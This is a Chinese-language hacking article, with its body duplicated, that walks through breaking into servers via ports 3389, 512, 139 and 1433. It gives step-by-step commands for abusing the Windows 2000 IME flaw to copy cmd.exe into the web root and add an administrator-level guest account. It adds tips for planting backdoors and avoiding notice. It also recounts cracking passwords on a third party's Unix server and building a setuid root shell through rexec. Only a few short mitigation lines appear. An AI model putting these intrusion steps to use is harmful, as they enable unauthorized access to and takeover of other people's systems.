实例解析80、512、3389等端口的入侵
互联网 发布时间:2008-10-08 19:36:05 作者:佚名 
我要评论
我要评论有很多网站为了安全起见,在WEB Server前面架了防火墙,或者做了TCP/IP过滤,对外只开放TCP 80端口。从入侵者角度来看,要入侵那么从80上跑的CGI入手是比较可行的,当然也可以用别的办法,例如旁敲侧击,呵呵。从网管角度来看,一是要保证CGI的安全性,另外网络的整体安全
3389端口的入侵
由于微软对中国产品不付责任的态度,使得安装了终端服务和全拼的w2k服务器存在着远程登陆并能获取超级用户权限的严重漏洞。
其过程如下:
1.扫描3389 port终端服务默认;2.用终端客户端程序进行连接;3.按ctrl shift调出全拼输入法(其他似乎不行),点鼠标右键(如果其帮助菜单发灰,就赶快赶下家吧,人家打补丁了),点帮助,点输入法入门;4.在“选项”菜单上点右键——>跳转到URL“,输入:c:winntsystem32cmd.exe.(如果不能确定NT系统目录,则输入:c:或d:……进行查找确定);5.选择”保存到磁盘“选择目录:c:inetpubs,因实际上是对方服务器上文件自身的复制操作,所以这个过程很快就会完成;6.打开IE,输入:http://ip/s/cmd.exe?/c dir怎么样?有cmd.exe文件了吧?这我们就完成了第一步;7.http://ip/s/cmd.exe?/c echo net user guest /active:yes>go.bat 8.http://ip/s/cmd.exe?/c echo net user guest elise》go.bat 9.http://ip/s/cmd.exe?/c echo net localgroup administrators /add guest》go.bat 10.http://ip/s/cmd.exe?/c type go.bat看看我们的批文件内容是否如下:
net user guest /active:yes net user guest elise net localgroup administrators /add guest 11.在“选项”菜单上点右键——>跳转到URL“,输入:c:inetpubsgo.bat ——>在磁盘当前位置执行;12.呵呵,大功告成啦,这样我们就激活了服务器的geust帐户,密码为:elise,超级用户呢!(我喜欢guest而不是建立新帐户,这样似乎不易被发现些),这样你就可用IPC$连接,想怎样做就怎样做了,当然,你也可用guest直接登陆到他的服务器,到他机器上去跳舞吧:-)
注意事项:1.当你用终端客户端程序登陆到他的服务器时,你的所有操作不会在他的机器上反应出来,但如果他正打开了终端服务管理器,你就惨了了:(这时他能看到你所打开的进程id、程序映象,你的ip及机器名,并能发消息给你!
2.当你连接时,会加重对方服务器的负荷,非常容易造成对方死机和断线,所以你的操作快点为妙。
3.尽快做好后门,暂时不要上传任何程序,一是防止断线,二是防止对方打上补丁!
个人观点:1.在IE下,所拥有的只是iusr_machine权限,因而,你不要设想去做越权的事情,如启动telnet、木马等;2.url的跳转下,你将拥有超级用户的权限,好好利用吧3.跳转到哪个目录下,通常只能查看、执行当前目录的文件,不能进入到子目录,如想进入,再跳一次吧!:)
4.此法似乎与对方的防火墙无关哦!
5.据本人实际操作,发现极易断线,但应与占用服务器资源无关。对方是384M RAM PIII,是静态IP,主要是做数据库服务器,RAID硬盘,SCSI CD ROM,开机18天了,02:00进去时,仍时常吊线。
堵漏办法:1.打补丁;2.删掉全拼输入法,用标准就成了嘛^_^;3.服务中关掉:Terminal Services,服务名称:TermService,对应程序名:system32termsrv.exe;
512端口入侵
已经是第六十几天了,我的Celeron 533仍不知疲倦的跑着JOHN……我是无意中注意到这个网站的,当时只是想看一下,方法是各位大虾都会的FINGER,然后猜用户口令进去的。进去之后PASSWD也没有SHADOWN,直接就可以看到,该系统用的是Digital unix系统,从PASSWD看得出里面的用户只有两个组:root和users,我猜中的就是一users级别的,发现这个级别的用户几乎没有什么权限,TELNET上去后发现/USR/USERS/XXX是各用户的HOME,而它们的属性全是drwx——,也就是说这里的用户是互不信任的关系(这一点大家在各免费主页服务器上经常可以看到),看来猜出再多用户级口令也没有用的。
root级的用户只有两名:root和shut.root我用john已跑了60多天,显然不可能再跑出来了,但幸运的是shut口令已跑出来了。我毫不犹豫的telnet上去——然后,网站就关闭了!@#~!#^%,我真笨,怎么没想到shut口令是干什么的?
网站很快就又开启了,我发现shut口令还是没改!这个网管是怎么当的,系统关了也不查一下原因!很显然,这个网站上只有root是有水平的,但他与服务器可能不在同地,对于开、关机之类的事情不能直接操纵,与是给当地的操作员一个root级帐号,然后在。profile文件中做了一个shell,使得帐号一登录就自动关系统。看看系统这么周密的设计,我想root设计这个shell时绝对关掉了path,所以我不打算在优先的path路径中放一同名的shell来阻止它。我如果能改掉这个文件再telnet上去不就是root级了吗?
但是shut的HOME目录是drwx——,别的帐号根本进不去。没关系,我试试ftp,530 user shut access denined(被拒绝),users组可以ftp上去同样进不了shut目录。而且该网站根本就没有开WWW服务,怎么办?为这个网站陆陆续续研究了许久,我总是乐观的鼓励自己,“起码我已经知道几十种进不去的方法了……”。“真正的黑客从来都是把困难当作乐趣,敞开的大门你请他进他都不进呢!”如此六十多天过去了,只到有一天……
我再一次用haktek扫描该网站,结果如下:Port 21 found. Desc='ftp' Port 23 found. Desc='telnet' Port 25 found. Desc='smtp' Port 79 found. Desc='finger' Port 111 found. Desc='portmap/sunrpc' Port 512 found. Desc='biff/exec' Port 513 found. Desc='login/who' Port 514 found. Desc='shell/syslog' Port 515 found. Desc='printer' Port 1024 found. Port 1025 found. Port 1526 found. Port 1528 found.
一个以前一直没有注意的Port 512引起我的注意,这个端口是什么时候开的?要知道它可以让用户不登录就可以运行服务器上的命令!!!赶紧试试!
打开一个软件winrsh32,填入user和password,在命令中填上ls -la,点运行哇,文件全列出来了,剩下的就简单了:cp /bin/sh /tmp/.temp;chown root /tmp/.temp;chmod 4755 /tmp/.temp.然后再用那个破掉的user级帐号telnet,cd/tmp;。temp.当#映入眼帘时,心却往下一沉,我突然感到一丝落寂……可惜这个root一世小心,却毁在了让shut可以使用512端口上。看来破坏一个世界总是比建立一个世界简单……
39端口入侵139端口入侵139端口的入侵,主要是通过建立空连接,而获得用户名和共享名,接着用字典法或穷举法来猜测ADMINISTRATORS的密码,这样可获得最高权限。
解决方法:1、禁止匿名共享。
2、禁止管理共享。
1433端口入侵1433端口入侵1433端口的入侵,主要是利用MS SQL SERVER默认sa的密码是空,通过远程执行命令而达到目的,或通过穷举法猜测密码
由于微软对中国产品不付责任的态度,使得安装了终端服务和全拼的w2k服务器存在着远程登陆并能获取超级用户权限的严重漏洞。
其过程如下:
1.扫描3389 port终端服务默认;2.用终端客户端程序进行连接;3.按ctrl shift调出全拼输入法(其他似乎不行),点鼠标右键(如果其帮助菜单发灰,就赶快赶下家吧,人家打补丁了),点帮助,点输入法入门;4.在“选项”菜单上点右键——>跳转到URL“,输入:c:winntsystem32cmd.exe.(如果不能确定NT系统目录,则输入:c:或d:……进行查找确定);5.选择”保存到磁盘“选择目录:c:inetpubs,因实际上是对方服务器上文件自身的复制操作,所以这个过程很快就会完成;6.打开IE,输入:http://ip/s/cmd.exe?/c dir怎么样?有cmd.exe文件了吧?这我们就完成了第一步;7.http://ip/s/cmd.exe?/c echo net user guest /active:yes>go.bat 8.http://ip/s/cmd.exe?/c echo net user guest elise》go.bat 9.http://ip/s/cmd.exe?/c echo net localgroup administrators /add guest》go.bat 10.http://ip/s/cmd.exe?/c type go.bat看看我们的批文件内容是否如下:
net user guest /active:yes net user guest elise net localgroup administrators /add guest 11.在“选项”菜单上点右键——>跳转到URL“,输入:c:inetpubsgo.bat ——>在磁盘当前位置执行;12.呵呵,大功告成啦,这样我们就激活了服务器的geust帐户,密码为:elise,超级用户呢!(我喜欢guest而不是建立新帐户,这样似乎不易被发现些),这样你就可用IPC$连接,想怎样做就怎样做了,当然,你也可用guest直接登陆到他的服务器,到他机器上去跳舞吧:-)
注意事项:1.当你用终端客户端程序登陆到他的服务器时,你的所有操作不会在他的机器上反应出来,但如果他正打开了终端服务管理器,你就惨了了:(这时他能看到你所打开的进程id、程序映象,你的ip及机器名,并能发消息给你!
2.当你连接时,会加重对方服务器的负荷,非常容易造成对方死机和断线,所以你的操作快点为妙。
3.尽快做好后门,暂时不要上传任何程序,一是防止断线,二是防止对方打上补丁!
个人观点:1.在IE下,所拥有的只是iusr_machine权限,因而,你不要设想去做越权的事情,如启动telnet、木马等;2.url的跳转下,你将拥有超级用户的权限,好好利用吧3.跳转到哪个目录下,通常只能查看、执行当前目录的文件,不能进入到子目录,如想进入,再跳一次吧!:)
4.此法似乎与对方的防火墙无关哦!
5.据本人实际操作,发现极易断线,但应与占用服务器资源无关。对方是384M RAM PIII,是静态IP,主要是做数据库服务器,RAID硬盘,SCSI CD ROM,开机18天了,02:00进去时,仍时常吊线。
堵漏办法:1.打补丁;2.删掉全拼输入法,用标准就成了嘛^_^;3.服务中关掉:Terminal Services,服务名称:TermService,对应程序名:system32termsrv.exe;
512端口入侵
已经是第六十几天了,我的Celeron 533仍不知疲倦的跑着JOHN……我是无意中注意到这个网站的,当时只是想看一下,方法是各位大虾都会的FINGER,然后猜用户口令进去的。进去之后PASSWD也没有SHADOWN,直接就可以看到,该系统用的是Digital unix系统,从PASSWD看得出里面的用户只有两个组:root和users,我猜中的就是一users级别的,发现这个级别的用户几乎没有什么权限,TELNET上去后发现/USR/USERS/XXX是各用户的HOME,而它们的属性全是drwx——,也就是说这里的用户是互不信任的关系(这一点大家在各免费主页服务器上经常可以看到),看来猜出再多用户级口令也没有用的。
root级的用户只有两名:root和shut.root我用john已跑了60多天,显然不可能再跑出来了,但幸运的是shut口令已跑出来了。我毫不犹豫的telnet上去——然后,网站就关闭了!@#~!#^%,我真笨,怎么没想到shut口令是干什么的?
网站很快就又开启了,我发现shut口令还是没改!这个网管是怎么当的,系统关了也不查一下原因!很显然,这个网站上只有root是有水平的,但他与服务器可能不在同地,对于开、关机之类的事情不能直接操纵,与是给当地的操作员一个root级帐号,然后在。profile文件中做了一个shell,使得帐号一登录就自动关系统。看看系统这么周密的设计,我想root设计这个shell时绝对关掉了path,所以我不打算在优先的path路径中放一同名的shell来阻止它。我如果能改掉这个文件再telnet上去不就是root级了吗?
但是shut的HOME目录是drwx——,别的帐号根本进不去。没关系,我试试ftp,530 user shut access denined(被拒绝),users组可以ftp上去同样进不了shut目录。而且该网站根本就没有开WWW服务,怎么办?为这个网站陆陆续续研究了许久,我总是乐观的鼓励自己,“起码我已经知道几十种进不去的方法了……”。“真正的黑客从来都是把困难当作乐趣,敞开的大门你请他进他都不进呢!”如此六十多天过去了,只到有一天……
我再一次用haktek扫描该网站,结果如下:Port 21 found. Desc='ftp' Port 23 found. Desc='telnet' Port 25 found. Desc='smtp' Port 79 found. Desc='finger' Port 111 found. Desc='portmap/sunrpc' Port 512 found. Desc='biff/exec' Port 513 found. Desc='login/who' Port 514 found. Desc='shell/syslog' Port 515 found. Desc='printer' Port 1024 found. Port 1025 found. Port 1526 found. Port 1528 found.
一个以前一直没有注意的Port 512引起我的注意,这个端口是什么时候开的?要知道它可以让用户不登录就可以运行服务器上的命令!!!赶紧试试!
打开一个软件winrsh32,填入user和password,在命令中填上ls -la,点运行哇,文件全列出来了,剩下的就简单了:cp /bin/sh /tmp/.temp;chown root /tmp/.temp;chmod 4755 /tmp/.temp.然后再用那个破掉的user级帐号telnet,cd/tmp;。temp.当#映入眼帘时,心却往下一沉,我突然感到一丝落寂……可惜这个root一世小心,却毁在了让shut可以使用512端口上。看来破坏一个世界总是比建立一个世界简单……
39端口入侵139端口入侵139端口的入侵,主要是通过建立空连接,而获得用户名和共享名,接着用字典法或穷举法来猜测ADMINISTRATORS的密码,这样可获得最高权限。
解决方法:1、禁止匿名共享。
2、禁止管理共享。
1433端口入侵1433端口入侵1433端口的入侵,主要是利用MS SQL SERVER默认sa的密码是空,通过远程执行命令而达到目的,或通过穷举法猜测密码
相关文章
CC主要是用来攻击页面的,大家都有这样的经历,就是在访问论坛时,如果这个论坛比较大,访问的人比较多,打开页面的速度会比较慢,对不?!一般来说,访问的人越多,论坛的页2024-01-06
入侵者主要通过Potato程序攻击拥有SYSTEM权限的端口伪造网络身份认证过程,利用NTLM重放机制骗取SYSTEM身份令牌,最终取得系统权限,该安全风险微软并不认为存在漏洞,所以2021-04-15
这篇文章主要介绍了文件上传漏洞全面渗透分析小结,这里主要为大家分享一下防御方法,需要的朋友可以参考下2021-03-21- 这篇文章主要介绍了sql手工注入语句&SQL手工注入大全,需要的朋友可以参考下2017-09-06
- 这篇文章主要介绍了详解Filezilla server 提权,需要的朋友可以参考下2017-05-13
FileZilla Server 2008 x64 提权与防御方法
这篇文章主要介绍了FileZilla Server 2008 x64 提权与防御方法,需要的朋友可以参考下2017-05-13- 不久之前我们说过关于http和https的区别,对于加密的https,我们一直认为它是相对安全的,可今天要讲的是,一种绕过HTTPS加密得到明文信息的web攻击方式,不知道这消息对你2016-08-10
iPhone和Mac也会被黑 一条iMessage密码可能就被盗了
一直以来苹果系统的安全性都是比安卓要高的,但是再安全的系统也免不了漏洞,苹果也一样。最近爆出的新漏洞,只需要接收一条多媒体信息或者iMessage就会导致用户信息泄露。2016-07-27- 国家正在修正关于黑客方面的法律法规,有一条震惊黑客圈的“世纪佳缘”起诉白帽黑客事件,深深的伤害了广大黑客们的心,加上扎克伯格和特拉维斯·卡兰尼克账号被盗,于是黑2016-07-11
如何逆向破解HawkEye keylogger键盘记录器进入攻击者邮箱
面对恶意邮件攻击,我们就只能默默忍受被他攻击,连自我保护能力都没有谈什么反抗?让人痛快的是,如今有了解决办法,逆向破解键盘记录器,进入攻击者邮箱2016-07-06
最新评论